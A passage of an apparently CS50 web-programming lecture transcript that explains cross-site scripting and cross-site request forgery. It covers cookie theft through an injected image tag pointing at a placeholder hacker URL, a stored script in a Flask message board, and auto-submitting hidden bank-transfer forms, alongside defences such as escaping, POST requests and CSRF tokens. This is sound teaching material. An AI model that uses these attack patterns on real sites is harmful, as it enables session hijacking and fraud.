--> 00:55:38,460 making a request to that server, that server is potentially 1239 00:55:38,460 --> 00:55:40,650 logging exactly what URL was requested. 1240 00:55:40,650 --> 00:55:43,200 In fact, if you've been using Flask or Django all this time 1241 00:55:43,200 --> 00:55:44,908 and you've looked at the terminal window, 1242 00:55:44,908 --> 00:55:47,439 you've probably noticed over here that you've 1243 00:55:47,439 --> 00:55:49,730 been able to see every single request that's been made. 1244 00:55:49,730 --> 00:55:54,510 Here was a GET request to the URL slash, here's a GET request to the URL /foo, 1245 00:55:54,510 --> 00:55:56,870 here's a GET request to the URL /bar. 1246 00:55:56,870 --> 00:56:01,140 And so if our hacker is carefully monitoring all of the requests 1247 00:56:01,140 --> 00:56:04,920 to the server over here at hacker URL, they're going to notice something like 1248 00:56:04,920 --> 00:56:09,480 someone made a request to hacker_url?cookie= and then some 1249 00:56:09,480 --> 00:56:10,200 cookie, right? 1250 00:56:10,200 --> 00:56:13,620 So by injecting this JavaScript code into the user's web browser 1251 00:56:13,620 --> 00:56:16,470 and having this run, they've added this image tag that's 1252 00:56:16,470 --> 00:56:18,810 going to make a request to hacker_url and is 1253 00:56:18,810 --> 00:56:21,480 going to pass this information, that cookie-- so now 1254 00:56:21,480 --> 00:56:23,610 the cookie that was originally on your computer, 1255 00:56:23,610 --> 00:56:27,210 someone else now has access to because you've now just put it inside 1256 00:56:27,210 --> 00:56:29,185 of some request that's going elsewhere. 1257 00:56:29,185 --> 00:56:32,310 And that's why Chrome was giving us that error, that warning message about, 1258 00:56:32,310 --> 00:56:32,940 well, be careful. 1259 00:56:32,940 --> 00:56:35,898 We tried to block you from being able to see this page because it looks 1260 00:56:35,898 --> 00:56:38,770 like someone might be able to inject JavaScript code that 1261 00:56:38,770 --> 00:56:41,860 might be able to steal your passwords or other information. 1262 00:56:41,860 --> 00:56:46,660 Because any information, we can just send in a request to some other URL, 1263 00:56:46,660 --> 00:56:47,930 in this case. 1264 00:56:47,930 --> 00:56:50,890 And so this is really the danger of cross-site scripting, this ability 1265 00:56:50,890 --> 00:56:55,090 to inject JavaScript into any arbitrary page. 1266 00:56:55,090 --> 00:56:57,689 Questions about any of that? 1267 00:56:57,689 --> 00:56:58,480 AUDIENCE: Question. 1268 00:56:58,480 --> 00:56:59,020 BRIAN YU: Great. 1269 00:56:59,020 --> 00:56:59,530 Yeah? 1270 00:56:59,530 --> 00:57:01,155 AUDIENCE: What did they do with cookie? 1271 00:57:01,155 --> 00:57:01,951 I mean-- 1272 00:57:01,951 --> 00:57:02,950 BRIAN YU: Good question. 1273 00:57:02,950 --> 00:57:04,160 What can we do with the cookie? 1274 00:57:04,160 --> 00:57:06,243 So once you have the cookie, you could potentially 1275 00:57:06,243 --> 00:57:08,950 use that to login as someone else, for instance. 1276 00:57:08,950 --> 00:57:12,200 Or any secure information that's stored in that cookie, you'd have access to. 1277 00:57:12,200 --> 00:57:15,954 So if there are secure pieces of data stored in the cookie, 1278 00:57:15,954 --> 00:57:17,620 then that's potentially a vulnerability. 1279 00:57:17,620 --> 00:57:19,872 And we talked about in last lecture, I believe, 1280 00:57:19,872 --> 00:57:21,580 how Flask gives you the option of, if you 1281 00:57:21,580 --> 00:57:24,880 want to, storing all of your session information inside of a cookie. 1282 00:57:24,880 --> 00:57:28,760 Which means secure information about the contents of your shopping cart 1283 00:57:28,760 --> 00:57:30,550 or how much money you have in your account 1284 00:57:30,550 --> 00:57:32,440 might be stored inside of that cookie, which 1285 00:57:32,440 --> 00:57:34,090 could potentially be a vulnerability. 1286 00:57:34,090 --> 00:57:36,020 But even if that's not there, at minimum, 1287 00:57:36,020 --> 00:57:38,860 that cookie is a way of convincing the server 1288 00:57:38,860 --> 00:57:40,970 that someone else is who you are. 1289 00:57:40,970 --> 00:57:44,260 If they steal your cookie, they can convince the server that they are you. 1290 00:57:44,260 --> 00:57:45,790 And then they can have access to your account 1291 00:57:45,790 --> 00:57:48,550 on whatever web application this is and potentially do whatever 1292 00:57:48,550 --> 00:57:50,725 they want with that information. 1293 00:57:50,725 --> 00:57:56,170 AUDIENCE: Would that be time bound with the-- like with that session, 1294 00:57:56,170 --> 00:57:58,150 that you'd have to use it for the next session? 1295 00:57:58,150 --> 00:57:59,090 BRIAN YU: Good question. 1296 00:57:59,090 --> 00:57:59,810 Would it be time bounded? 1297 00:57:59,810 --> 00:58:00,935 It quite possibly could be. 1298 00:58:00,935 --> 00:58:02,920 That if I were to log out for instance and now 1299 00:58:02,920 --> 00:58:05,830 the server forgets about that cookie, now suddenly we've 1300 00:58:05,830 --> 00:58:08,230 been able to avert this scenario, or this is no longer 1301 00:58:08,230 --> 00:58:09,279 going to be a valid way. 1302 00:58:09,279 --> 00:58:12,070 But if they can convince me to click on the URL again the next time 1303 00:58:12,070 --> 00:58:15,590 I log into the site, now it suddenly becomes a problem all over again. 1304 00:58:15,590 --> 00:58:17,590 And so we'll want to think carefully about, when 1305 00:58:17,590 --> 00:58:20,480 we're using JavaScript inside of our web applications, 1306 00:58:20,480 --> 00:58:22,610 is there a place where we might be vulnerable. 1307 00:58:22,610 --> 00:58:26,470 In fact, our original web application didn't even have any JavaScript in it 1308 00:58:26,470 --> 00:58:27,320 at all. 1309 00:58:27,320 --> 00:58:30,760 It was really just Flask and returning text. 1310 00:58:30,760 --> 00:58:34,900 But still, a malicious hacker was able to inject JavaScript into our page 1311 00:58:34,900 --> 00:58:38,552 just because we were including that raw JavaScript in there as well. 1312 00:58:38,552 --> 00:58:40,510 So these are certainly things to be mindful of. 1313 00:58:40,510 --> 00:58:43,180 And both Flask and Django have ways of making sure 1314 00:58:43,180 --> 00:58:46,960 that when you're inserting information, it's inserted in a safe way such 1315 00:58:46,960 --> 00:58:50,200 that we escape any potential JavaScript characters to help 1316 00:58:50,200 --> 00:58:51,980 avoid these types of situations. 1317 00:58:51,980 --> 00:58:54,010 But these are just good things to be mindful of 1318 00:58:54,010 --> 00:58:59,110 and be careful about as we go about designing these web applications. 1319 00:58:59,110 --> 00:59:02,770 Let's go ahead and take another look at another example of cross-site scripting 1320 00:59:02,770 --> 00:59:04,420 and how it can happen. 1321 00:59:04,420 --> 00:59:07,269 What I will look at now is a slightly more complicated site, 1322 00:59:07,269 --> 00:59:09,310 and this is one that Chrome is actually not going 1323 00:59:09,310 --> 00:59:11,150 to be able to fully defend against. 1324 00:59:11,150 --> 00:59:16,090 And what cross-site scripting one is is it's 1325 00:59:16,090 --> 00:59:19,472 a web application that is going to display a message list. 1326 00:59:19,472 --> 00:59:20,680 It's sort of a message board. 1327 00:59:20,680 --> 00:59:23,380 We saw a brief example of something that looked very similar to this 1328 00:59:23,380 --> 00:59:25,000 when we were first taking a look at Flask 1329 00:59:25,000 --> 00:59:26,999 and how we're able to render templates and such. 1330 00:59:26,999 --> 00:59:28,600 This one actually uses a database. 1331 00:59:28,600 --> 00:59:31,550 And I'll show you what it looks like. 1332 00:59:31,550 --> 00:59:33,460 We'll look at application.py. 1333 00:59:33,460 --> 00:59:35,699 So I have a SQLite database that I'm going 1334 00:59:35,699 --> 00:59:38,365 to be using that's just going to store a whole bunch of messages 1335 00:59:38,365 --> 00:59:40,750 so that it can be on this public message board. 1336 00:59:40,750 --> 00:59:44,590 And effectively, I have just one route, a default index route, 1337 00:59:44,590 --> 00:59:48,550 where if I'm just viewing this page by a GET request, 1338 00:59:48,550 --> 00:59:51,777 just asking to see the page, I skip over this post stuff, 1339 00:59:51,777 --> 00:59:53,110 and I just get all the messages. 1340 00:59:53,110 --> 00:59:57,040 Selecting star from messages, just get all the messages in the message board. 1341 00:59:57,040 --> 01:00:00,310 And then go ahead and render this template, index.html passing 1342 01:00:00,310 --> 01:00:01,870 in those messages. 1343 01:00:01,870 --> 01:00:05,830 And then, if it's a post request, then I'm 1344 01:00:05,830 --> 01:00:09,940 going to get whatever the contents of the message that I'm trying to add 1345 01:00:09,940 --> 01:00:12,340 is, whatever came in through this form, and then I'm 1346 01:00:12,340 --> 01:00:16,730 going to insert into my messages table, whatever that content is. 1347 01:00:16,730 --> 01:00:20,350 So if I type in a new message and insert it, I submit that via a post request. 1348 01:00:20,350 --> 01:00:22,890 It gets added to my list of growing messages. 1349 01:00:22,890 --> 01:00:25,270 And otherwise, if I'm just requesting the page normally, 1350 01:00:25,270 --> 01:00:27,732 or even after something is done being inserted, 1351 01:00:27,732 --> 01:00:29,440 I'm going to request for all the messages 1352 01:00:29,440 --> 01:00:32,800 by selecting it all from the database and then rendering it inside 1353 01:00:32,800 --> 01:00:34,690 of index.html. 1354 01:00:34,690 --> 01:00:36,100 So what does that look like? 1355 01:00:36,100 --> 01:00:38,890 The result is that using just these couple of lines of code, 1356 01:00:38,890 --> 01:00:42,820 I now have this Message List site where I can type in foo as a message, 1357 01:00:42,820 --> 01:00:43,650 submit that. 1358 01:00:43,650 --> 01:00:46,600 And now the message foo is there, bar goes in there, 1359 01:00:46,600 --> 01:00:48,670 and this gets added to the public message board. 1360 01:00:48,670 --> 01:00:51,887 And of course, if I were to close this site and I were to open it again 1361 01:00:51,887 --> 01:00:54,220 or someone else were to open it again on their computer, 1362 01:00:54,220 --> 01:00:57,670 because it's all drawing from the same database, now I go back here again. 1363 01:00:57,670 --> 01:01:00,920 Foo and bar are still there, so those messages are still there. 1364 01:01:00,920 --> 01:01:08,958 And so where is the opportunity for cross-site scripting attacks here? 1365 01:01:08,958 --> 01:01:12,201 AUDIENCE: You could store a script in the database. 1366 01:01:12,201 --> 01:01:12,950 BRIAN YU: Exactly. 1367 01:01:12,950 --> 01:01:16,840 We could store a script in the database, a script could be one of the messages. 1368 01:01:16,840 --> 01:01:19,820 Such that that JavaScript code gets just inserted 1369 01:01:19,820 --> 01:01:23,094 into the HTML contents of this page here, 1370 01:01:23,094 --> 01:01:24,510 and then it could potentially run. 1371 01:01:24,510 --> 01:01:31,460 So if I were to add a message that was like, script alert hi /script, 1372 01:01:31,460 --> 01:01:35,214 and then submit that, well, what seems to happen here is that when I try 1373 01:01:35,214 --> 01:01:37,130 and submit it, Chrome is giving me some error. 1374 01:01:37,130 --> 01:01:39,880 It's giving me that same error as before, this page isn't working. 1375 01:01:39,880 --> 01:01:41,089 Chrome detected unusual code. 1376 01:01:41,089 --> 01:01:43,921 Here's that cross-site scripting auditor saying, hey, wait a minute, 1377 01:01:43,921 --> 01:01:44,880 something's wrong. 1378 01:01:44,880 --> 01:01:48,320 And the reason it was able to do that is because when 1379 01:01:48,320 --> 01:01:50,600 I was submitting my request, there was some JavaScript 1380 01:01:50,600 --> 01:01:52,100 included inside that request. 1381 01:01:52,100 --> 01:01:53,937 So Chrome was able to detect that something 1382 01:01:53,937 --> 01:01:57,020 might be a little fishy there, that I was submitting this JavaScript along 1383 01:01:57,020 --> 01:01:59,186 with the request, and then it was coming back to me. 1384 01:01:59,186 --> 01:02:04,370 So what about if I were to close the page and open it again. 1385 01:02:04,370 --> 01:02:06,050 Now I'm just requesting the page. 1386 01:02:06,050 --> 01:02:08,672 There's no JavaScript in the URL, and all that's happening 1387 01:02:08,672 --> 01:02:10,880 is that it's extracting information from the database 1388 01:02:10,880 --> 01:02:12,590 and displaying it onto the page. 1389 01:02:12,590 --> 01:02:14,630 And so Chrome now has no real way of knowing 1390 01:02:14,630 --> 01:02:17,360 that there is any potential cross-site scripting involved. 1391 01:02:17,360 --> 01:02:19,940 So I go here, and now I get the hi alert. 1392 01:02:19,940 --> 01:02:22,815 They were able to run arbitrary JavaScript on this page. 1393 01:02:22,815 --> 01:02:25,190 And then I see foo and bar and then just some empty thing 1394 01:02:25,190 --> 01:02:28,920 because that's where the JavaScript code was before. 1395 01:02:28,920 --> 01:02:33,470 It's like here's an example of us being able to add a cross-site scripting 1396 01:02:33,470 --> 01:02:37,040 vulnerability that we were able to take advantage of, exploit, by just adding 1397 01:02:37,040 --> 01:02:39,720 JavaScript code into here as well. 1398 01:02:39,720 --> 01:02:43,085 And so I haven't been committing these changes to the database. 1399 01:02:43,085 --> 01:02:44,210 I haven't been saving them. 1400 01:02:44,210 --> 01:02:47,390 So if I run this again, we'll be reset back to a clean slate. 1401 01:02:47,390 --> 01:02:49,984 So if I go back here, I see a blank message list again. 1402 01:02:49,984 --> 01:02:52,400 So what are some other things that I could potentially do? 1403 01:02:52,400 --> 01:02:57,080 Well, I might be able to say someone does foo and then bar. 1404 01:02:57,080 --> 01:02:58,540 Maybe I could say-- 1405 01:02:58,540 --> 01:03:00,540 I just want to display whatever contents I want. 1406 01:03:00,540 --> 01:03:03,905 So I'm going to add JavaScript that says document.body.innerH 1407 01:03:03,905 --> 01:03:14,149 TML=whateverpageIwant/script, and I submit that. 1408 01:03:14,149 --> 01:03:16,190 Again, Chrome blocks it the first time because it 1409 01:03:16,190 --> 01:03:17,660 detects that, with this request at least, 1410 01:03:17,660 --> 01:03:19,345 there was something fishy going along. 1411 01:03:19,345 --> 01:03:22,220 But when the next request comes in, when the next person comes along, 1412 01:03:22,220 --> 01:03:24,489 they open this page, now message list is gone. 1413 01:03:24,489 --> 01:03:26,780 I don't see foo and bar or any of those other messages. 1414 01:03:26,780 --> 01:03:29,780 I just see whatever the contents of the page that I wanted to show was. 1415 01:03:29,780 --> 01:03:32,387 And that gets displayed to the user here. 1416 01:03:32,387 --> 01:03:34,220 So that's certainly one thing they could do. 1417 01:03:34,220 --> 01:03:37,428 Certainly stealing cookies is another thing that could happen in the same way 1418 01:03:37,428 --> 01:03:38,970 that we saw it in the last example. 1419 01:03:38,970 --> 01:03:40,490 Or someone could say, you know what? 1420 01:03:40,490 --> 01:03:42,650 Let's just take the user to an entirely different site. 1421 01:03:42,650 --> 01:03:45,980 Let's take them to my site where I can now try and steal information from them 1422 01:03:45,980 --> 01:03:49,990 as well by saying window.location equals, 1423 01:03:49,990 --> 01:03:54,620 and I can say cs50.github.io/web. 1424 01:03:54,620 --> 01:03:59,012 And so now this window.location equals some URL is the JavaScript code 1425 01:03:59,012 --> 01:03:59,720 that I'm running. 1426 01:03:59,720 --> 01:04:00,660 I'll submit that. 1427 01:04:00,660 --> 01:04:03,470 And when the next user comes along and they try and go to my page, 1428 01:04:03,470 --> 01:04:04,670 now they're suddenly redirected. 1429 01:04:04,670 --> 01:04:06,350 I've taken them somewhere else entirely. 1430 01:04:06,350 --> 01:04:09,190 And if that other new page looks sort of similar to the old page, 1431 01:04:09,190 --> 01:04:11,690 they might be tricked into thinking it is the same old page. 1432 01:04:11,690 --> 01:04:14,939 And they might be interacting with it, typing in their credentials, usernames, 1433 01:04:14,939 --> 01:04:18,620 and passwords, and now this hacker is able to gain access to that as well. 1434 01:04:18,620 --> 01:04:21,770 And so how do we defend against these sorts of cross-site scripting 1435 01:04:21,770 --> 01:04:23,300 vulnerabilities? 1436 01:04:23,300 --> 01:04:25,370 Well, Flask is actually pretty good about this. 1437 01:04:25,370 --> 01:04:28,610 And by default, when you're rendering a template, like render template, 1438 01:04:28,610 --> 01:04:32,480 and you're plugging in some information, Flask will, by default, automatically 1439 01:04:32,480 --> 01:04:33,636 escape that stuff for you. 1440 01:04:33,636 --> 01:04:34,760 It will say, you know what? 1441 01:04:34,760 --> 01:04:37,725 This is stuff that could potentially be JavaScript 1442 01:04:37,725 --> 01:04:40,850 or could potentially be unsafe, so we'll go ahead and escape it and protect 1443 01:04:40,850 --> 01:04:41,892 that information for you. 1444 01:04:41,892 --> 01:04:43,683 Certainly not all frameworks are like that, 1445 01:04:43,683 --> 01:04:46,070 and certainly if you're just doing string concatenation 1446 01:04:46,070 --> 01:04:48,170 like we were in the previous example, then that's 1447 01:04:48,170 --> 01:04:50,880 not something we can really rely on. 1448 01:04:50,880 --> 01:04:54,920 But if we take a look at templates index.HTML, 1449 01:04:54,920 --> 01:04:59,060 in order for this to really work the way that I wanted it to, 1450 01:04:59,060 --> 01:05:02,870 I had to add this bar safe in here, where 1451 01:05:02,870 --> 01:05:06,560 this is my way of telling Jinja2, the template rendering engine, 1452 01:05:06,560 --> 01:05:08,060 don't worry about escaping anything. 1453 01:05:08,060 --> 01:05:09,500 Just display the contents. 1454 01:05:09,500 --> 01:05:12,139 And so in reality, if you were to just do message.content, 1455 01:05:12,139 --> 01:05:14,930 Flask would be smart enough to try and defend against this for you. 1456 01:05:14,930 --> 01:05:16,763 But it is something that you just want to be 1457 01:05:16,763 --> 01:05:20,820 careful about anytime you have text that you think is safe, is it really safe? 1458 01:05:20,820 --> 01:05:23,780 Is there a potential for JavaScript code to be injected into there? 1459 01:05:23,780 --> 01:05:27,320 And if you're generating the templates yourself by string concatenation 1460 01:05:27,320 --> 01:05:30,770 like we were in the previous example, is there an opportunity for cross-site 1461 01:05:30,770 --> 01:05:33,440 scripting to appear there as well? 1462 01:05:33,440 --> 01:05:37,850 And so that's certainly one of the major vulnerabilities that 1463 01:05:37,850 --> 01:05:42,560 can come about as we start to deal with JavaScript 1464 01:05:42,560 --> 01:05:45,486 and using JavaScript inside of our web applications. 1465 01:05:45,486 --> 01:05:46,360 Questions about that? 1466 01:05:46,360 --> 01:05:49,600 1467 01:05:49,600 --> 01:05:50,350 All right. 1468 01:05:50,350 --> 01:05:52,810 Let's move on and take a look at the next web framework 1469 01:05:52,810 --> 01:05:55,180 that we talked about, which in particular was Django. 1470 01:05:55,180 --> 01:05:56,620 And so when we first took a look at Django, 1471 01:05:56,620 --> 01:05:58,900 we looked at how we would go about doing the same things we 1472 01:05:58,900 --> 01:06:01,540 did in Flask, about rendering templates and displaying pages 1473 01:06:01,540 --> 01:06:04,090 and using server side logic to handle requests. 1474 01:06:04,090 --> 01:06:06,020 And in particular, we looked at forms. 1475 01:06:06,020 --> 01:06:08,681 And when we did look at forms, I had to add a line 1476 01:06:08,681 --> 01:06:10,930 to one of the forums that seemed a little bit strange. 1477 01:06:10,930 --> 01:06:12,580 Does anyone remember what that line was? 1478 01:06:12,580 --> 01:06:13,080 Yes? 1479 01:06:13,080 --> 01:06:14,320 AUDIENCE: CSRF token. 1480 01:06:14,320 --> 01:06:16,690 BRIAN YU: Yeah, we added the CSRF token line to it. 1481 01:06:16,690 --> 01:06:19,630 And I said don't worry about that for now, we'll talk about it later. 1482 01:06:19,630 --> 01:06:22,296 And now is that time that we're going to start talking about it. 1483 01:06:22,296 --> 01:06:25,420 CSRF stands for Cross-Site Request Forgery. 1484 01:06:25,420 --> 01:06:27,910 And this is yet another type of attack that people 1485 01:06:27,910 --> 01:06:30,910 can use where Cross-Site Request Forgery is 1486 01:06:30,910 --> 01:06:35,920 the idea of trying to forge a request to some other website 1487 01:06:35,920 --> 01:06:39,560 in order to take some action that the user might already be logged into. 1488 01:06:39,560 --> 01:06:41,330 And so what might be an example of that? 1489 01:06:41,330 --> 01:06:45,040 Let's say, for instance, that someone was logged into their bank, 1490 01:06:45,040 --> 01:06:46,480 on their bank's website. 1491 01:06:46,480 --> 01:06:49,810 And I, on some other website, wanted to try and trick 1492 01:06:49,810 --> 01:06:53,620 the user into transferring some money to me, for instance. 1493 01:06:53,620 --> 01:06:55,140 How might I to go about doing that? 1494 01:06:55,140 --> 01:06:56,890 Well, you might imagine very simply that I 1495 01:06:56,890 --> 01:06:59,181 might start by creating a website, my own website, that 1496 01:06:59,181 --> 01:07:00,790 looks something like this. 1497 01:07:00,790 --> 01:07:04,160 I have the body of my website, I have an a href, a link. 1498 01:07:04,160 --> 01:07:09,610 And this link goes to HTTP:yourbank.com/transfer, 1499 01:07:09,610 --> 01:07:13,240 and then some arguments, some GET parameters, transfer to Brian, amount, 1500 01:07:13,240 --> 01:07:14,920 2,800, for instance. 1501 01:07:14,920 --> 01:07:17,170 And if the bank is set up in this such way, 1502 01:07:17,170 --> 01:07:21,640 where making a GET request to /transfer by passing in as arguments who 1503 01:07:21,640 --> 01:07:25,057 you're transferring to and what the amount is initiates a transfer, 1504 01:07:25,057 --> 01:07:27,640 now I've been able to create a sort of security vulnerability. 1505 01:07:27,640 --> 01:07:30,420 That if this is what's displayed on my page 1506 01:07:30,420 --> 01:07:33,820 and I can convince someone to click here, so long as they're already 1507 01:07:33,820 --> 01:07:37,210 logged in to yourbank.com, then clicking on that link 1508 01:07:37,210 --> 01:07:39,620 automatically will initiate that transfer. 1509 01:07:39,620 --> 01:07:42,250 So if yourbank.com is set up in that way, 1510 01:07:42,250 --> 01:07:45,550 such that transferring money just happens via this GET request, 1511 01:07:45,550 --> 01:07:48,460 then that's certainly a way that I could trick someone 1512 01:07:48,460 --> 01:07:50,350 into transferring money to me. 1513 01:07:50,350 --> 01:07:53,110 What are some ways to protect against that? 1514 01:07:53,110 --> 01:07:58,027 What can yourbank.com do to make sure that we can't do something like this? 1515 01:07:58,027 --> 01:07:59,860 Such that someone else can't just add a link 1516 01:07:59,860 --> 01:08:02,026 that says click here and then automatically initiate 1517 01:08:02,026 --> 01:08:03,010 the transfer of money. 1518 01:08:03,010 --> 01:08:03,210 Yeah? 1519 01:08:03,210 --> 01:08:05,335 AUDIENCE: When you're doing an operation like this, 1520 01:08:05,335 --> 01:08:08,946 you want to send some token with it so it 1521 01:08:08,946 --> 01:08:11,954 knows that it was you that's doing it, and you're not being played. 1522 01:08:11,954 --> 01:08:13,120 BRIAN YU: Great, some token. 1523 01:08:13,120 --> 01:08:17,242 And certainly, we'll see more about that when we get to some more details. 1524 01:08:17,242 --> 01:08:19,700 But right now, this is just a link that you're clicking on. 1525 01:08:19,700 --> 01:08:21,310 So we're just clicking on a link. 1526 01:08:21,310 --> 01:08:23,278 And what else could the bank do? 1527 01:08:23,278 --> 01:08:24,819 But that's certainly one good answer. 1528 01:08:24,819 --> 01:08:28,691 1529 01:08:28,691 --> 01:08:32,174 AUDIENCE: Not expose a service with a GET request like that. 1530 01:08:32,174 --> 01:08:32,840 BRIAN YU: Great. 1531 01:08:32,840 --> 01:08:34,304 Not expose a GET request like this. 1532 01:08:34,304 --> 01:08:35,720 That could certainly be something. 1533 01:08:35,720 --> 01:08:38,470 And in fact, this is something that's generally good web practice. 1534 01:08:38,470 --> 01:08:42,444 That you don't want GET requests to be modifying the state of something, 1535 01:08:42,444 --> 01:08:44,319 like modifying who has what amounts of money. 1536 01:08:44,319 --> 01:08:47,231 That generally, all of that should be inside of a POST request, such 1537 01:08:47,231 --> 01:08:49,939 that it really needs to be a form submission that needs to happen 1538 01:08:49,939 --> 01:08:52,609 in order to allow that to happen. 1539 01:08:52,609 --> 01:08:54,800 And of course, maybe this isn't such a big deal 1540 01:08:54,800 --> 01:08:57,979 because I'm saying, click here. 1541 01:08:57,979 --> 01:09:01,515 And so as long as the user is smart and as long as they're careful and they 1542 01:09:01,515 --> 01:09:03,890 hover over the link and see, oh, this is going to take me 1543 01:09:03,890 --> 01:09:07,370 to yourbank.com/transfer, then I'm safe. 1544 01:09:07,370 --> 01:09:09,180 So how might a hacker get around that? 1545 01:09:09,180 --> 01:09:11,990 In order to make it such that the user doesn't need to click on, 1546 01:09:11,990 --> 01:09:13,948 click here, in order to initiate that transfer? 1547 01:09:13,948 --> 01:09:18,074 AUDIENCE: They don't need [INAUDIBLE] in other website. 1548 01:09:18,074 --> 01:09:18,740 BRIAN YU: Great. 1549 01:09:18,740 --> 01:09:22,160 So hypothetically, we could just add some JavaScript code here 1550 01:09:22,160 --> 01:09:25,642 that says that rather than a link that someone needs to click on, 1551 01:09:25,642 --> 01:09:28,100 we'll just add some JavaScript code that will automatically 1552 01:09:28,100 --> 01:09:29,683 redirect the user there, for instance. 1553 01:09:29,683 --> 01:09:32,930 And that could be something that could happen as well. 1554 01:09:32,930 --> 01:09:35,922 But then at minimum, the user is taken to that other web site, 1555 01:09:35,922 --> 01:09:38,130 and now they can see that that transfer has happened. 1556 01:09:38,130 --> 01:09:40,671 But there are even more subtle ways about doing this as well. 1557 01:09:40,671 --> 01:09:42,760 We looked at, in a couple of slides ago, we 1558 01:09:42,760 --> 01:09:45,260 talked about how image tags, for instance, can be used. 1559 01:09:45,260 --> 01:09:48,590 Where if you provide the link to whatever the source of the image is, 1560 01:09:48,590 --> 01:09:51,300 that will automatically trigger a request there as well. 1561 01:09:51,300 --> 01:09:54,740 And so you might imagine that instead of structuring my hacking page like this, 1562 01:09:54,740 --> 01:09:59,360 if I tried this as my exploit instead, just render an image where the source 1563 01:09:59,360 --> 01:10:03,680 of that image is yourbank.com/transfer and here's what I'm transferring. 1564 01:10:03,680 --> 01:10:06,420 Now, no need for a user to click on any link at all. 1565 01:10:06,420 --> 01:10:08,800 As soon as they go to my page, your web browser 1566 01:10:08,800 --> 01:10:11,030 is going to make a request to this URL, and that's 1567 01:10:11,030 --> 01:10:15,410 going to potentially start to initiate a transfer. 1568 01:10:15,410 --> 01:10:18,900 And so that's certainly a potential security vulnerability. 1569 01:10:18,900 --> 01:10:21,380 And so someone suggested OK, well, rather 1570 01:10:21,380 --> 01:10:25,250 than make your bank take all of its transfers via GET requests, 1571 01:10:25,250 --> 01:10:27,540 we might instead want to do this via making it a form 1572 01:10:27,540 --> 01:10:29,540 that someone needs to submit, some POST request. 1573 01:10:29,540 --> 01:10:33,050 That it can't just be you clicking on a link or you rendering some image 1574 01:10:33,050 --> 01:10:36,210 that's going to trigger the transfer of funds. 1575 01:10:36,210 --> 01:10:41,330 So maybe you might imagine that I could do something like this. 1576 01:10:41,330 --> 01:10:44,150 This might be an exploit that I can use now on my site. 1577 01:10:44,150 --> 01:10:48,320 That I create a form whose action is yourbank.com/transfer, 1578 01:10:48,320 --> 01:10:51,680 the method is POST, and now I have these hidden input type, 1579 01:10:51,680 --> 01:10:53,150 input type equals hidden. 1580 01:10:53,150 --> 01:10:55,950 This is an input type that's just not going to appear to the user. 1581 01:10:55,950 --> 01:10:57,720 The user is not going to see this at all. 1582 01:10:57,720 --> 01:11:01,826 It's an input type named to, whose value is who I want to transfer the money to. 1583 01:11:01,826 --> 01:11:04,700 I have an input type that is the amount, which is the amount of money 1584 01:11:04,700 --> 01:11:06,410 that I want to transfer. 1585 01:11:06,410 --> 01:11:08,870 And then I have an input type called submit, 1586 01:11:08,870 --> 01:11:11,900 which is just going to be a button that says click here. 1587 01:11:11,900 --> 01:11:16,430 And so all the user is going to see, if this code is rendered, is what? 1588 01:11:16,430 --> 01:11:18,090 What does the user see? 1589 01:11:18,090 --> 01:11:19,000 AUDIENCE: Click here. 1590 01:11:19,000 --> 01:11:19,490 BRIAN YU: Exactly. 1591 01:11:19,490 --> 01:11:21,448 They just see this one input field, this button 1592 01:11:21,448 --> 01:11:24,320 that says click here, because these two input fields are hidden. 1593 01:11:24,320 --> 01:11:26,194 And of course, click here could say anything. 1594 01:11:26,194 --> 01:11:28,116 It could say next page, for instance. 1595 01:11:28,116 --> 01:11:30,740 Something benign that looks like something you might reasonably 1596 01:11:30,740 --> 01:11:32,656 just click that would take you somewhere else, 1597 01:11:32,656 --> 01:11:35,960 when in reality, it's submitting a form that's going to transfer funds 1598 01:11:35,960 --> 01:11:38,180 to someone and to some amount. 1599 01:11:38,180 --> 01:11:41,010 But of course, maybe we're OK because if the user is careful 1600 01:11:41,010 --> 01:11:43,310 and they're not going to click on the button, then-- 1601 01:11:43,310 --> 01:11:44,480 and then if they're not clicking on a button 1602 01:11:44,480 --> 01:11:47,438 when they don't know what that button actually does, then they're safe, 1603 01:11:47,438 --> 01:11:52,970 how might a hackers still get around this and still be able to get the user 1604 01:11:52,970 --> 01:11:54,669 to submit this form? 1605 01:11:54,669 --> 01:11:56,460 Even without the user clicking on a button. 1606 01:11:56,460 --> 01:12:01,421 1607 01:12:01,421 --> 01:12:01,920 Yeah? 1608 01:12:01,920 --> 01:12:05,185 AUDIENCE: Can you do a POST request from JavaScript code? 1609 01:12:05,185 --> 01:12:07,560 BRIAN YU: Can you do a POST request from JavaScript code? 1610 01:12:07,560 --> 01:12:08,739 Certainly you can. 1611 01:12:08,739 --> 01:12:10,530 We actually looked at ways we could do that 1612 01:12:10,530 --> 01:12:14,561 before when we were talking about AJAX and making requests to a server 1613 01:12:14,561 --> 01:12:16,560 in order to get more information from the server 1614 01:12:16,560 --> 01:12:18,660 after we've already loaded the page. 1615 01:12:18,660 --> 01:12:20,542 So that's certainly one option as well. 1616 01:12:20,542 --> 01:12:23,250 Another way we could do it is just by adding this additional line 1617 01:12:23,250 --> 01:12:26,130 to the body, on load-- when you're done loading-- 1618 01:12:26,130 --> 01:12:27,890 here's what the body should do. 1619 01:12:27,890 --> 01:12:32,220 Document.form0, get the first form in the document and submit it. 1620 01:12:32,220 --> 01:12:34,410 Just by adding that single line of JavaScript code, 1621 01:12:34,410 --> 01:12:38,080 now as soon as the user loads this page, this form will be submitted, 1622 01:12:38,080 --> 01:12:42,972 and then that will initiate the transfer at yourbank.com 1623 01:12:42,972 --> 01:12:46,830 So certainly, this isn't a good scenario we want to be in. 1624 01:12:46,830 --> 01:12:49,620 This is CSRF, Cross-Site Request Forgery, 1625 01:12:49,620 --> 01:12:54,540 where we are able to create a request to some other site 1626 01:12:54,540 --> 01:12:57,690 and pretend that request was originally from yourbank.com in order 1627 01:12:57,690 --> 01:12:59,040 to initiate the transfer. 1628 01:12:59,040 --> 01:13:02,160 And so long as I know what parameters that request takes, 1629 01:13:02,160 --> 01:13:03,874 I'm able to forge that request. 1630 01:13:03,874 --> 01:13:05,790 And so the solution, as was pointed out, which 1631 01:13:05,790 --> 01:13:08,910 is what Django uses and a bunch of other web frameworks use, 1632 01:13:08,910 --> 01:13:11,880 is to add a special token, effectively a password. 1633 01:13:11,880 --> 01:13:16,260 Where the idea is that you would write this inside of your Django code, 1634 01:13:16,260 --> 01:13:19,800 and if you were to look at the HTML that gets rendered as a result, what's 1635 01:13:19,800 --> 01:13:23,790 actually happening is that in place of CSRF token, 1636 01:13:23,790 --> 01:13:26,460 the web server, the Django web server, is 1637 01:13:26,460 --> 01:13:30,390 inserting some long string, some effectively a token or 